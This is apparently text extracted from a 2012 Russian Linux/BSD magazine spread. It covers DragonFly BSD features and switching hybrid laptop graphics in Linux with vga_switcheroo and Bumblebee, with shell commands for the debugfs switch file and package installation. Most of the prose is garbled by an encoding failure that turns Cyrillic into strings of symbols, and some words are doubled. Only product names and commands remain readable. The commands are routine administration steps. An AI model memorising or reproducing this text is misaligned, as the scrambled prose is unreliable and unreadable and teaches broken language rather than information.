"# /'),+ $#,, R$%<. 0%$%& D$%$ %<*#- &%;"% <.4% 2%))$#"%2'$? 2 0#&($' ' 0*%/%4;#$? ')0%4?-%2#$? 0*'4%;+"'+. F% &"%6%& %" "#0%&'"#+$ 5$'4'$5 CryoPID /4( Linux (cryopid.berlios.de), %/"#-,% *+#4'-#>'( 2.0%4"+"# 2"5$*' (/*#, # 0%$%&5 4'1+"# &"%6'8 ++ "+/%)$#$,%2. S$%<. -#&%*%-'$? 0*'4%;+"'+, /%)$#$%R"% "#;#$? <Ctrl+E>, # /4( *#-&%*%-,' — 2.0%4"'$? ,%&#"/5 checkpt -r file.ckpt. 7*'4%;+"'+ %)$#"+$)( 2 $%& ;+ )%)$%("'', 2 ,%$%*%& <.4% 2 &%&+"$ -#&%*%-,'.

=# D$%3 $+8"%4%6'' %)"%2#" ' &+8#"'-& 5),%*+"'( -#05),# 0*'4%;+"'3, ,%$%*.3 2.0%4"(+$ 2 DragonFly $5 ;+ *%4?, R$% ' $+8"%4%6'( 0*+/2#*'$+4?"%3 4'",%2,' (prelinking) 0*'4%;+"'3 2 Linux. H#<%$#+$ %" 0*#,$'R+),' '/+"$'R"% $+8"%4%6'' )%8*#"+-"'( )%)$%("'(, -# $+& '),4:R+"'+&, R$% %<*#- )%8*#"(+$)( "+ 2 %$-/+4?".3 B#34, # 2"5$*? )#&%6% ')0%4"(+&%6% B#34# )% )0+>'#4?-"%3 0%&+$,%3 /4( 4'",%29',# ld-elf.so, ,%$%*.3 0*%05),#+$ 1#6' 0% 4'",%2,+ B#34# ' *#-&+9#+$ +6% 2 0#&($?, ,#, +)$?. F DragonFly D$# $+8"%4%6'( "#-.2#+$)( resident ' 0%-2%4(+$ )59+)$2+""% )%,*#$'$? 2*+&( -#05),# $(;+4%2+)".8 0*'4%;+"'3, -#2')(9'8 %$ &"%6'8 <'<4'%$+,.

O*%&+ 2)+6% 0+*+R')4+""%6%, 2 DragonFly $#,;+ <.4# ) "54( *+#4'-%2#"# )%<)$2+""#( 2'*$5#4?"#( B#34%2#( )')$+&# devfs, %$2+$)$2+""#( -# 8*#"+"'+ B#34%2 5)$*%3)$2, B#34%2#( )')$+&# nullfs /4( &%"$'*%2#"'( %<*#-%2 /'),%2, 0%/)')$+&# 1'B*%2#"'( /'),%2.8 *#-/+4%2, %0$'&'-'*%2#""#( /4( *#<%$. "# &"%6%(/+*-".8 )')$+&#8, 5$'4'$# tcplay /4( *#<%$. ) *#-/+4#&' ' %<*#-#&', -#1'B*%2#"".&' ) 0%&%9?: TrueCrypt, "%2.3 )0*#2+/4'2.3 04#-"'*%29', 22%/#-2.2%/# bfq, &+8#"'-& ;5*"#4'*%2#"'( B#34%2%3 )')$+&. UFS, &#))# 0%/)%<".8 5$'4'$, 2*%/+ cpdup /4( ,4%"'-*%2#"'( ,#$#4%6%2, # $#,;+ &"%;+)$2% /*#32+*%2 ' 0%/)')$+&, 0%*$'*%2#"".8 '- /*56'8 BSD-)')$+&.

FTFAET 7%,# +9+ *#"% 6%2%*'$? %< 5)0+8+ DragonFly ,#, %0+*#>'%""%3 )')$+&. /4( &"%6%(/+*".8 )')$+& ' ,4#)$+*%2, %/"#,% )2%3 )4+/ 2 ')$%*'' %"# 5;+ %)$#2'4#, 2."5/'2 *#-*#<%$R',%2 /*56'8 AQ 0+*+)&%$*+$? )2%' 2-64(/. "# $%, ,#, )')$+&# /%4;"# *#<%$#$? "# &"%6%0*%>+))%*".8 &#1'"#8. C"%6'+ '/+' DragonFly 5;+ <.4' 0+*+"($. *#-*#<%$R',#&' OpenBSD, FreeBSD ' Linux 2 '8 *+#4'--#>'' &"%6%0%$%R"%)$' 2"5$*' (/*#, R$% 0%-2%4'4% 0%/"($? 0*%-'-2%/'$+4?"%)$? "# "%2.3 5*%2+"?. U#34%2#( )')$+&# HAMMER $#,;+ 2.-2#4# <%4?1%3 '"$+*+) )0+>'#4')$%2, "+,%$%*.+ '- "'8 /#;+ 0*')$50'4' , ++ 0+*+"%)5 2 Linux ' FreeBSD. z

)+,-./01230!

INFO

• 4 5-61 78+-9: ,86 DragonFly BSD . 61;8+71 2011 <-68 !=9>? &@//-, .:0.@/ ,1@A.139,B? -C@+;B . D7-E13-3-785 AMD, ;-9-780 2-</8 D7@.-6@9> ; ;785B D7@/-F1,@G.

WWW

• goo.gl/hZfpO — D@3>2- . 3D@3-; 7833:/;@ freebsd-current 3 8,-,3-2 DragonFly BSD;• goo.gl/PB5Qv — 6/@,,:G 3D@3-; D7-1;9-., D/8,@7B12:5 ; 718/@A8E@@ .DragonFlyBSD;• www.shiningsi-lence.com/dbsdlog — +/-< - 3-39-0,@@ 78A.@9@0 )H.

I171A 97@ 2130E8 @,F1,17: AMD D-6-9.176@/@ ,8/@J@1 -C@+;@.

• 4 ;8J139.1 2158,@A28 B398,-.;@ 39-7-,,1<- K) . DragonFly -L@E@8/>,- @3D-/>AB1930 3@39128 D-79-. pkg-src @A -D178E@-,,-G 3@3912: Net-BSD, 8 ;-/@J139.- D71;-2D@/@7--.8,,:5 D8;19-. D171.8/@.819 A8 7000.

• &/0 ,-728/>,-G 78+-9: HAMMER 6-3989-J,- ;-2D8 3- 128 !+ )MN (6/0 378.,1,@0: ZFS 971+B1930 ;8; 2@,@2B2 1 O+).

!"#$%&#&'($)* +,$ #&-.% '$)$/(&0" 1*(2 (%023% 0"42 /)$#/(-%5 -*-%#& 3&)(".3" .& 63)&.. 7$8%#.9 %." /'%/%1.* %1)&1&(*-&(2 %8)%5.*$

%1:$5* ".;%)5&<"", "= 5%>.%/(" 5%,.% "/'%02?%-&(2 #09 +/3%)$."95&($5&("@$/3"= %'$)&<"A, 5%,.% '$)$30B@&(2/9 .& 0$(+ 5$,#+

.$/3%023"5" 3&)(&5" " #&,$ %1:$#".9(2 - -*/%3%')%"?-%#"($02.*A 30&/($). C (%5, 3&3 -/$ 6(% /#$0&(&(2 2 -- LiLinunux,x, 9 )&//3&,+ - #&..%A /(&(2$.

!"#$%&&''()$$** &&++((,,$*$---.$(/##$$+0"",,''. -" 11++2--))3

00"')40)

UNIXOID !"#$%&' ()*%&% (execbit.ru)

!"#$% 09 /164/ 2012114

&0,.'.$ ,$!$,(.

!"#$%$& #&'&#($

!"#$% 09 /164/ 2012 115

LINUX ) *+,-./.0)1 0)23)4-.5 0367)8) 89:;< #&=> '<?9;@% 9 A9($? %&?A9B9:@C? @ D#9;(@AE%$? (9'F9G-A9H%C? G&B&'<, D9B>'9(<%&B@ Linux D9=%@ (H&:;< 9"<'$(<I%HC ( D#9B&%&. J#9@'(9;@%&B@ 9K9#E;9(<A@C #&;"9 '<;EF$(<I%HC 9K 9;A9F-;(E? D#9L&A%<? D9B>'9(<%&B&M <B>%&#A<%@(A$? .!, 9H%<(BCC @? K&' ;#<M(&#9(, N@#F&AA$? E%@B@% @ %&?A@=&H"9M D9;;&#G"@. 49B:9& (#&FC 9;A@F@ @' A&FA9:@?, "%9 (H&#>&' '<-A@F<BHC D9BA9L&AA9M D9;;&#G"9M H(9&:9 9K9#E;9(<A@C ( Linux, 9H%<(<B@H> "9FD<A@@ Intel, NVIDIA @ (=<H%@=A9) ATI, H(9&(#&F&AA9 ($DEH"<(O@& "<=&H%(&AA$& ;#<M(&#$ ;BC D@A:(@A<, 9;A<"9 @ 9A@ A& HF9:B@ 9K&HD&=@%> E#9(&A> H9(F&H%@F9H%@ H9 H(9@F 9K9-#E;9(<A@&F, ;9H%EDA$M D9B>'9(<%&BCF (H&F @'(&H%A9M 9D&#<L@-9AA9M H@H%&F$.

*<", ( =<H%A9H%@, HBE=@B9H> H A9E%KE"<F@, 9HA<P&AA$F@ %&?A9-B9:@&M :@K#@;A9M :#<N@"@, D9'(9BCIP&M 9%"BI=<%> ;@H"#&%A$M (@;&9<;<D%&# A< (#&FC D#9H%9C H@H%&F$ @ '<;&MH%(9(<%> (F&H%9 A&:9 @A%&:#@#9(<AA$M ( F<%&#@AH"EI DB<%E :#<N@=&H"@M D#9L&H-H9#. Q H@H%&F<? D9; ED#<(B&A@&F Windows Vista/Seven %&?A9B9:@C #<K9%<B< D#<"%@=&H"@ @' "9#9K"@ @ D9'(9BCB< HEP&H%(&AA9 D#9-;B@%> G@'A> A9E%KE"< 9% K<%<#&@, %9:;< "<" D9B>'9(<%&B&M Linux %<"9M D9;?9; " R"9A9F@@ RA&#:@@ H%<(@B ( %ED@".

0#<N@=&H"<C D9;H@H%&F< Linux A@"9:;< A& K$B< #<HH=@%<A< A< (9'F9GA9H%> D&#&"BI=&A@C (@;&9<;<D%&#9( A< B&%E @ H%#9@B<H> A< D#&;D9B9G&A@@, =%9 ( H@H%&F& &H%> %9B>"9 9;@A <;<D%&#, 9%-(&=<IP@M '< ($(9; :#<N@"@. S%9 <KH9BI%A9 B9:@=A<C @ H%#9MA<C H?&F<, "9%9#<C A&DB9?9 (D@H$(<B<H> ;<G& ( @;&I SLI, 9;A<"9 A9(<C «:&A@<B>A<C» F$HB> ?<#;(<#P@"< HB9F<B< && A< "9#AI.

!A<=<B< D9C(@B@H> A9E%KE"@ H ?<#;(<#A$F FEB>%@DB&"H9#9F (@;&9($(9;<, " "9%9#9FE Linux E;<B9H> D#@HD9H9K@%> ?9%C K$ =<H%@=A9 H D9F9P>I @A%&:#<L@@ ( C;#9 H@H%&F$ vga_switcheroo — 9A< D&#&"BI=<&% (@;&9($?9; A< ;#E:9M <;<D%&# H D9F9P>I ($'9(9( NEA"L@M ACPI, A9 %#&KE&% D&#&'<DEH"< X Window (9K R%9F HD9H9K& C #<HH"<GE =E%> D9'G&). T<%&F D9C(@B9H> A&=%9 A9(9& @ A&9G@;<AA9&, "9%9#9& ( "9FD<A@@ NVIDIA 9"#&H%@B@ %&?A9B9:@-&M Optimus (Synergy A< ;&H"%9D<?). .A<, ( 9%B@=@& 9% H%<A;<#%A$? F&?<A@'F9( D&#&"BI=&A@C, (99KP& A& %#&K9(<B< A<B@=@C FEB>-%@DB&"H9#< @ #<K9%<B< A< 9HA9(& D&#&A<D#<(B&A@C :#<N@=&H"@? "9F<A;, D9BE=&AA$? ;#<M(&#9F NVIDIA, A< (H%#9&AA$M ( F<%&#@A-"E <;<D%&# Intel.

!9 (#&F&A&F R%< D#9KB&F< K$B< #&O&A< H D9F9P>I H@H%&-F$ Bumblebee, "9%9#<C @HD9B>'E&% %&?A9B9:@I (@#%E<B@'<L@@ OpenGL, D9'(9BCIPEI D&#&A<D#<(BC%> :#<N@=&H"@& "9F<A;$ A< #<'A$& (@;&9<;<D%&#$. .;A<"9 A@ 9 "<"9F F&%9;& <(%9F<%@=&H"9-:9 ($K9#< AEGA9:9 <;<D%&#<, D#@F&AC&F9:9 ( ;#<M(&#<? NVIDIA ;BC Windows, D#@ R%9F #&=@ A& @;&%, ?9%C #<K9%$ ( ;<AA9M 9KB<H%@ EG& (&;E%HC.

VGA_SWITCHEROO !@H%&F< vga_switcheroo, D9'(9BCIP<C @HD9B>'9(<%> ?<#;(<#-A$M FEB>%@DB&"H9# ;BC D&#&"BI=&A@C F&G;E (@;&9<;<D%&#<F@,

D9C(@B<H> &P& ( C;#& Linux 2.6.34 @ ;9 H@? D9# 9KB<;<&% ;(EFC HE-P&H%(&AA$F@ 9:#<A@=&A@CF@: A&9K?9;@F9H%>I '<(&#O&A@C @"H9( D&#&; D&#&"BI=&A@&F @ '<(@H@F9H%>I 9% (@;&9;#<M(&#<, "9%9#<C D#9C(BC&%HC ( %9F, =%9 D&#&"BI=&A@& (9'F9GA9 %9B>"9 D#@ @H-D9B>'9(<A@@ 9%"#$%$? (@;&9;#<M(&#9(. QH& R%9 HEP&H%(&AA9 9:#<A@=@(<&% D9B&'A9H%> %&?A9B9:@@ :@K#@;A9M :#<N@"@, 9;A<"9 A< K&'#$K>&, "<" @'(&H%A9, @ D@A:(@A <"EB<.

)HD9B>'9(<%> vga_switcheroo ;9(9B>A9 D#9H%9. .A EG& ("BI=&A ( C;#9, D9R%9FE A@"<"@? 9H9K$? O<F<AH%( @ %<AL&( H KEKA9F @H-D9BAC%> A& D#@;&%HC. 4BC A<=<B< E;9H%9(&#@FHC, =%9 A<O& C;#9 H9K#<A9 H D9;;&#G"9M ;<AA9M %&?A9B9:@@:

$ grep -i switcheroo /boot/confi g-*

+HB@ (H& 9", D#9(&#C&F A<B@=@& N<MB< /sys/kernel/debug/vgaswitcheroo/switch @ D#9HF9%#@F &:9 H9;&#G@F9&:

$ ls -l /sys/kernel/debug/vgaswitcheroo/switch$ cat /sys/kernel/debug/vgaswitcheroo/switch0:+:Pwr:0000:00:02.01: :Off:0000:01:00.0

TA<" DBIH< ';&H> E"<'$(<&% A< <"%@(AEI "<#%E, < HB9(9 Pwr — A< %9, =%9 9A< ("BI=&A<, @B@, @A$F@ HB9(<F@, A< A&M &H%> A<D#C-G&A@&. !<F9 H99%(&%H%(@& F&G;E A9F&#<F@ @ (@;&9<;<D%&#<F@ F9GA9 D9HF9%#&%> H D9F9P>I HB&;EIP&M "9F<A;$:

$ lspci | grep VGA

J&#&"BI=&A@& F&G;E <;<D%&#<F@ 9HEP&H%(BC&%HC H D9F9P>I '<D@H@ "9F<A; ( %9% G& N<MB. !"#$%&%'& (")'*$)+',&-.%)/,' 3D-0"#1'2' %# +'/2"&,%)3 ' $/,")&%%)3 2#",#4

5&2),)"6& %)7,872' ()*$)-9:, $68"#,. '/()-.*7&;7: () 7;)-<#%': $'+&)2#",7 $ CMOS Setup

=)%,")-.%#9 (#%&-. NVIDIA $ /'/,&;& / ()++&">2)3 Optimus ,&(&". ';&&, +)()-%',&-.%7: $2-#+27

UNIXOID

!"#$% 09 /164/ 2012116

!"#$% &%''#()*+,#-". /#"-0 1%2,3':• DIS — !"#"$%&'"()" (* +),$#"-(.& /)+"0$*#-.;• IGD — !"#"$%&'"()" (* )(-"1#)#0/*((.& /)+"0$*#-.;• DDIS — !"#"$%&'"()" (* +),$#"-(.& /)+"0$*#-.

!#) ,%"+.&2"3 4*!.,$" X-,"#/"#*;• DIGD — !"#"$%&'"()" (* )(-"1#)#0/*((.& /)+"0$*#-.

!#) ,%"+.&2"3 4*!.,$" X-,"#/"#*;• ON — /$%&')-5 ("),!0%54."3.& /)+"0$*#-.;• OFF — /6$%&')-5 ("),!0%54."3.& /)+"0$*#-..

7(-"#",(63) +%8 (*, 4+",5 0,-*&-,8 -0%5$0 +/": DDIS ) DIGD, -*$ $*$ !04/0%8&- !#0)4/0+)-5 3*()!.%89)) !#830 )4 X Window (!"#/6" +/" ,#*:0-*&- -0%5$0 / $0(,0%)). ;"!"#5 !0!#0:."3 !"#"-$%&')-5,8 (* /,-#0"((.& $*#-.:

$ sudo -s# echo ON > /sys/kernel/debug/vgaswitcheroo/switch# echo DIGD > /sys/kernel/debug/vgaswitcheroo/switch

<*%"" /6=0+)3 )4 X Window %&:63 .+0:(63 ,!0,0:03 ((*!#)-3"#, , !03025& 4*/"#>"()8 ,"*(,*) ) %01)()3,8 /(0/5, !#) ?-03 (" 4*:6/*"3 0-$%&')-5 +),$#"-(.& $*#-.:

# echo OFF > /sys/kernel/debug/vgaswitcheroo/switch

@:#*-(0" !"#"$%&'"()" !#0)4/0+)-,8 -"3 A" ,!0,0:03. B)$*$)= *%5-"#(*-)/(6= $0(C)10/ )$,0/ !#) ?-03 (" -#":."-,8. X-,"#/"# ,*3 !0+=/*-)- *$-)/(.& $*#-. ) :.+"- ),!0%540/*-5 "" +%8 /6/0+* 1#*C)$). <%8 .+0:,-/* 30A(0 ),!0%540/*-5 ,$#)!- switch_between_cards.sh (0!.:%)$0/*( / :%01" asusm51ta-with-linux.blogspot.com), (" 4*:6/ /6!0%()-5 $03*(+.:

# chown ȦȖȢȝ_ȲțșȤȡȱȝȠ /sys/kernel/debug/vgaswitcheroo/switch

) +0:*/)-5 "" / C*D% /etc/init.d/rc.local. E,-*-), ?-* A" $03*(+* !0-4/0%)- /#.'(.& )43"(8-5 #"A)36 :"4 ),!0%540/*()8 sudo.

F EFE GH OPTIMUS? <%8 (0.-:.$0/, 0,(0/*((6= (* -"=(0%01)) NVIDIA Optimus, !#)-3"("()" vga_switcheroo :",,36,%"((0. 7= ,),-"3* !"#"$%&'"()8 3"A+. /)+"0*+*!-"#*3) 0,(0/*(* (* /)#-.*%)4*9)) /640/0/ OpenGL, * (" !#)3"("()) A"%"4(010 3.%5-)!%"$,0#*. <#*D-/"# NVIDIA, !#)3"(8"36D / -*$)= (0.-:.$*=, #*:0-*"- / ,/84$" , )(-"1#)#0/*((0D / 3*-"#)($. $*#-0D Intel. E01+* 4*!.,$*"-,8 !#)%0A"()", +#*D/"# NVIDIA */-03*-)'",$) #*,!04(*"-, 8/%8"-,8 %) 0(0 #",.#,0"3$)3 1#*C)'",$)3 !#)%0A"()"3 (?-0 !#0),=0+)- , !03025& *(*%)4* /640/0/ DirectX ) :*46 +*((6= !#)%0A"()D), ) !#)()3*"- #">"()" 0 !"#"(*!#*/%"()) OpenGL-$03*(+ +#*D/"#. Intel, #*41#.A*8 -*$)3 0:#*403 +),$#"-(.& /)+"0$*#-. NVIDIA, %):0 0: )= 0:#*:0-$" (* $*#-" NVIDIA. I#) ?-03 +*A" ",%) !#)-%0A"()" 4*!.,$*"-,8 (* $*#-" NVIDIA, #"4.%5-)#.&2*8 $*#-)($* /," #*/(0 0-!#*/%8"-,8 (* $*#-. Intel , !03025& $0!)#0/*()8 )40:#*A"()8 / "" :.C"# $*+#0/. ;*$)3 0:#*403 .+*"-,8 +0:)-5,8 ,0,.2",-/0/*()8 !#)%0A"()D, #*:0-*&2)= (* #*4(6= *+*!-"#*=, (* 0+(03 ?$#*(" :"4 ("0:=0+)30,-) !0,-08((010 !"#"$%&'"()8 (0.-:.$* (* #*4(6" *+*!-"#6 ) , /0430A(0,-5& 0-$%&')-5 +),-$#"-(6D *+*!-"# / ,%.'*" "10 !#0,-08.

J ,.2",-/.&2)" -"=(0%01)) Linux -*$0D !0+=0+ .$%*+6-/*"-,8 0'"(5 !%0=0, 0 '"3 NVIDIA '",-(0 4*8/)%* ,00:2",-/., ,,6%*8,5 (* .2"#:(0,-5 X-,"#/"#*, 4(*')-"%5(.& '*,-5 $0-0#010 !#)>%0,5 :6 !"#"!),*-5, ) 0-$*4*%*,5 0- !0++"#A$) Optimus / Linux. ;"3 (" 3"("" ,0/,"3 ,$0#0 !0,%" (*'*%* !0/,"3",-(010 #*,!#0,-#*("()8 -"=(0%01)) <?D/ K#%) (Dave Airlie), ,0-#.+()$ Red Hat ) 0+)( )4 +"/"%0!"#0/ X Window, #*4#*:0-*% 3"-0+ 4*-!.,$* !#)%0A"()D (* #*4(6= 1#*C)'",$)= $*#-*= , !0,%"+.&2"D $03!0(0/$0D )= /6/0+* / "+)(0" )40:#*A"()" (* .#0/(" 8+#* Linux ('-0 )(-"#",(0, #*:0-* :6%* !#0+"%*(* (* ,),-"3" , /)-+"0*+*!-"#03 Radeon R200).

I04+("" )4 "10 )+"D /6#0, !#0"$- Bumblebee, */-0#6 $0-0#010 !0>%) "2" +*%5>" ) /0/," 0-$*4*%),5 0- $*$0D-%):0 30+)C)$*9)) 8+#* )%) +#*D/"#0/ / !0%54. !#)3"("()8 /-0#010 X-,"#/"#*, 4*!.2"((010 (* +),$#"-(0D /)+"0$*#-", (0 (" !#)-/84*((010 $ C)4)'",$03. +),!%"&. <%8 4*!.,$* #",.#,0"3-$)= !#)%0A"()D (* ?-03 ,"#/"#" ),!0%54."-,8 ,!"9)*%5(*8 0:"#-$*, $0-0#*8 !"#"+*"- "3. /," OpenGL-$03*(+6 , !03025& ,),-"36 VirtualGL (www.virtualgl.org) ) !"#"(*!#*/%8"- ,C0#-3)#0/*((0" )40:#*A"()" / 0$(0 0,(0/(010 X-,"#/"#*. ;*$)3 0:#*403 .+*"-,8 4*+"D,-/0/*-5 +),$#"-(6D *+*!-"# -0%5$0 +%8 /6:#*((6= !#)%0A"()D !0'-) -*$ A", $*$ ?-0 #"*%)40-/*(0 / +#*D/"#*= NVIDIA +%8 Windows, (0 :"4 ),!0%540/*()8 C)#3"((010 3"=*()43* $0!)#0/*()8 !*38-) The Optimus Copy Engine, )4-4* '"10 0:2*8 !#0)4/0+)-"%5(0,-5 !#)%0A"()D 0$*-4*%*,5 (",$0%5$0 ()A".

;"3 (" 3"("" Bumblebee #*:0-*"- ) +*"- +0,-*-0'(0 02.-)36D !#)#0,- !#0)4/0+)-"%5(0,-) 3D-!#)%0A"()D. B*')(*8 , -#"-5"D

4#53%6%$*. &#(#1678#3*. ,',&-#(%+ " &%2%907 2:60-*&6#1"%(, NVIDIA Optimus +;&%63.#- &#(#1678#3*# &(%$(,223%

! "#$%&', '"#( )&*# /sys/kernel/debug/vgaswitcheroo/switch +' ,-".$/'+, ,-0&12 1 3-+)(4 /etc/fstab "#',$56$5 7&/("2:

none /sys/kernel/debug debugfs defaults 0 0

! <=>?@AB 4C>DDECA

!"#$%$& #&'&#($

!"#$% 09 /164/ 2012 117

(&#)**, +, %-".& /+'(+01&% -(%+2-%*3&)"* +%"043-%5 6*)"#&%,$7 -6-/%&# ( )083-& &9+ :&'6&7)%(*1 * 8/#-(01%5 &9+ ;,&#9+):&#&.&-,*&2. < %+28 .& :0-9+6-#1 "+)%$05,+-(&0+)*/&6,+7 -#=*%&"%8#& &9+ 0&9"+ 8)%-,+(*%5 * ,-3-%5 *)/+05'+(-%5 6-.& :&' /&#&'-9#8'+" * +:,+(0&,*1 6#-7(&#+(.

>#&"+2/*0*#+(-,,$& /-"&%$ Bumblebee 6+)%8/,$ 601 6*)-%#*:8%*(+( Debian, Ubuntu, Fedora * Mandriva, - ( (*6& /+#%+( &)%5 ( Gentoo * ArchLinux, /+;%+28 "-"*=-0*:+ /#+:0&2 ) 8)%--,+("+7 (+',*",8%5 ,& 6+0.,+. ?6*,)%(&,,+&, 3%+ )0&68&% 83&)%5, ;%+ ,&+:=+6*2+)%5 8)%-,+("* )/&@*-05,+7 (&#)** +A*@*-05,$= 6#-7(&#+( NVIDIA, "+%+#$& ,& :868% "+,A0*"%+(-%5 ) :*:0*+%&"+7 LibGL, /+)%-(01&2+7 (2&)%& ) /-"&%+2 Mesa * *)/+05'8&2+7 *,-%&9#*#+(-,,+7 (*6&+"-#%+7 Intel. B )083-& Debian/Ubuntu '-2&,- +A*@*-05,+9+ /#+/#*&%-#,+9+ 6#-7(&#- 6+0.,- :$%5 ($/+0,&,- )0&684C*2 +:#-'+2:1. !"#"$%&#'$(% ) (*+,*-.+*/ #"01/".2. 23%-"+1" 3#%4)"#% NVIDIA 1 ,&"+"#1#*)%++*&* "&* ',5%+*)61-

(*/ (*+71&% xorg.conf:

$ sudo -s# nvidia-uninstall# rm /etc/X11/xorg.conf

3. !"#"',5%+*)(% 818-1*5"(1 LibGL 1$ 9%("5% Mesa:

# apt-get --reinstall install libgl1-mesa-glx

4. 2,5%+*)(% Bumblebee 1$ ,5*#*++"&* #"9*$15*#1::

# add-apt-repository ppa:ubuntu-x-swat/x-updates# add-apt-repository ppa:bumblebee/stable

# apt-get update# apt-get install bumblebee

5. 2,5%+*)(% ,9";1%-.+*4 )"#,11 3#%4)"#% NVIDIA:

# apt-get install bumblebee-nvidia

6. !"#"$%&#'$(% ) &#%71<",(14 #"01/.?)0* %$ )+:*#-&D5)1 *)/+05'+(-%5 +%"#$%$7 6#-7(&# NVIDIA, 6+)%-%+3,+ :86&% ($/+0,*%5 %+05"+ 3&%(&#%$7 D-9, +6,-"+ ( ;%+2 )083-& /#+*'(+6*%&05,+)%5 :86&% 6-0&"+ ,& ,- ($)D&2 8#+(,&. ?)0* ,&+:=+6*2+ '-/8)%*%5 32-:*%,$& /#*0+.&,*1 ( 64-:*%,+7 )*)%&2& (,-/#*2&#, *9# /+6 Wine), %-".& ,8.,+ 6+8)%-,+(*%5 32-:*%,84 (&#)*4 VirtualGL:

# apt-get install virtualgl-libs-ia32

>+)0& +"+,3-,*1 8)%-,+("* ( )*)%&2& /+1(*%)1 6&2+, bumblebeed, +%(&3-4C*7 '- '-/8)" A&7"+(+9+ X-)&#(&#- * /&#&-6-38 &28 OpenGL-"+2-,6, * "+2-,6- optirun, *)/+05'8&2-1 601 '-/8)"- /#*0+.&,*7 ,- 6*)"#&%,+7 (*6&+"-#%&. B Ubuntu 6&2+, 8.& 6+0.&, :$%5 '-/8C&, *,)%-001%+#+2; ( 6#89*= )*)%&2-=, (+'2+.,+, /#*6&%)1 '-/8)"-%5 &9+ )-2+)%+1%&05,+. E01 /#+(&#-"* #-:+%+)/+)+:,+)%* Bumblebee 2+.,+ '-/8)%*%5 )%-,6-#%,$7 OpenGL-%&)% glxgears:

$ optirun glxgears

E01 '-/8)"- /#*0+.&,*7 /+6 Wine *)/+05'8&2 %-"84 "+2-,68:

$ optirun wine ȣȤȜȟȢȚșȡȜș.exe

<)%-%*, 8%*0*%- nvidia-settings /+ 82+03-,*4 #-:+%-%5 ,& :86&%, * && )0&68&% '-/8)"-%5 ) -#982&,%+2 '-c :8':

$ optirun nvidia-settings -c :8

E01 %+9+ 3%+:$ /+083*%5 ,-*083D84 /#+*'(+6*%&05,+)%5, 2+.,+ /+*9#-%5)1 ) +/@*12* ).-%*1 (*6&+/+%+"-, /&#&6-(-&2+9+ ) A&7"+(+9+ X-)&#(&#- ( +",+ ,-)%+1C&9+. E01 ;%+9+ ,-6+ *)-/+05'+(-%5 +/@*4 '-c' "+2-,6$ optirun, +,- /#*,*2-&% )0&684C*& -#982&,%$: jpeg, rgb, yuv, proxy * xv. F-*:+0&& ;AA&"%*(,$& *' ,*= yuv * xv, ,+ 2+.,+ /+/#+:+(-%5 * 6#89*&.

G HIE?J KL >MNOMGPFN? >?M?<KQP?FL? R?SEI GEG>J?MGRL? H0-9+6-#1 /#+&"%-2 vga_switcheroo * Bumblebee /+05'+(-%&0* Linux /+083*0* (+'2+.,+)%5 =+%5 "-"-%+ '-6&7)%(+(-%5 (%+#84 (*-6&+"-#%8 )+(#&2&,,$= ,+8%:8"+(, ,+ 9+(+#*%5 +: 86+:)%(& ;%*= )/+-)+:+( /&#&"043&,*1, "+,&3,+ .&, ,& /#*=+6*%)1. !-2- 9#-A*3&)"-1

=%9',( smplayer +% 31,(#"5+*4 )13"*(%#5"

!"#$%&', ($)*+ %#&#"', -.)-$&/- 0/1#)*2#.340$ GPU 5"3607$/%0, 1)3& 8)- /0/&$94', .'70/)$40:, 4$ /.-2344', / 5"360%#::• BrookGPU — -2'% ("3/;0"$44': <0)

0 %#910)-&#" 8)- 93&$93&07$/%0, .'70/)$40: / 0/1#)*2#.340$9 GPU;

• Sh — 9$&3-2'%, 04&$5"0"=$9': . C++ 1"0)#>$40-, 1#2.#)-$& .'1#)4-&* "-8 .'70/)0&$)*4', #1$"3(0: 43 GPU;

• NVIDIA Cg Toolkit — ?0?)0#&$%3 #& NVIDIA 8)- .2309#8$:/&.0- / GPU;

• GPUSort — 0/1#)*2#.340$ GPU 8)- /#"&0"#.%0 8344',;

• VRAM Storage Device — Linux-8"3:.$" 8)- /#28340- )#507$/%#5# 80/%3 / 8344'90, ,"3409'90 . .08$#139-&0;

• gpgpu.org (General-Purpose Computation Using Graphics Hardware) — /1$(03)020"#-.344': /3:& 1# 4$/&3483"&4#9= 0/1#)*2#-.340+ GPU.

>?@AB>CBDA>E? F?AGCE H@!GIJ=GKB>HL KEMH@IHA?IJ>GN FGO>G@AH PDBQHM?@RHS RBDA

UNIXOID

!"#$% 09 /164/ 2012118

!"#$%$&'() Linux ('*)'& +,-&,". /')0%1)2%% ('&"#) 3'$*"+,"4" !'/'5067',%- ('8#9 )#)!&'/)(%, % + !'/+96 "7'/'#: +$' 9!%/)-'&$- + 9$&)/'+*%. X-$'/+'/, )/;%&'5&9/) 5"&"/"4" ,' !"1+"0-'& /')0%1"+)&: $"+('$&,"' %$!"0:1"+),%' #+9; )#)!&'/"+ ,) "#,"( 9$&/".$&+' +<+"#). =&" 1,)7%&, 7&" X-$'/+'/ #"08', 3<&: 0%3" 5)/-#%,)0:," %1(',',, 0%3" +<3/"*', % 1)(',', ,) ,'7&" ,"+"'.

>"1("8,", /)1/)3"&7%5% Wayland + $5"/"( +/'(',% % /'-*)& ?&9 !/"30'(9, "#,)5" !"5) (< "$&)'($- ,) "3<7,<; %5$); % ("8'( !"0)4)&:$- &"0:5" ,) %; /)1/)3"&7%5"+. @#%, %1 ,%;, 98' 9!"(-,9&<. + ?&". $&)&:' A?+%# =/0%, 9$!'0 #"3%&:$- $9B'-$&+',,<; /'190:&)&"+ + ?&"( #'0', !'/'!%$)+ (,"4%' 5"(!",',&< X-$'/+'/), ) &)58' #"3)+%+ + -#/" &' $)(<' %1(',',%-, " 5"-&"/<; 3<0" $5)1)," + !/'#<#9B'( /)1#'0'. > !'/+96 "7'/'#: '4" /)3"&) ,)!/)+0',) ,) "3'$!'7',%' +"1("8,"$&% 4"/-7'4" !"#5067',%- +,'*,'4" USB-)#)!&'/) DisplayLink % '4" ,"/()0:-,"4" C9,52%",%/"+),%-, "#,)5" ,)/)3"&5% ("49& 3<&: 0'45" !/%$!"$"30',< #0- 3<$&/"4" !'/'5067',%- ('8#9 /)10%7,<(% 4/)C%7'$5%(% 5)/&)(%.

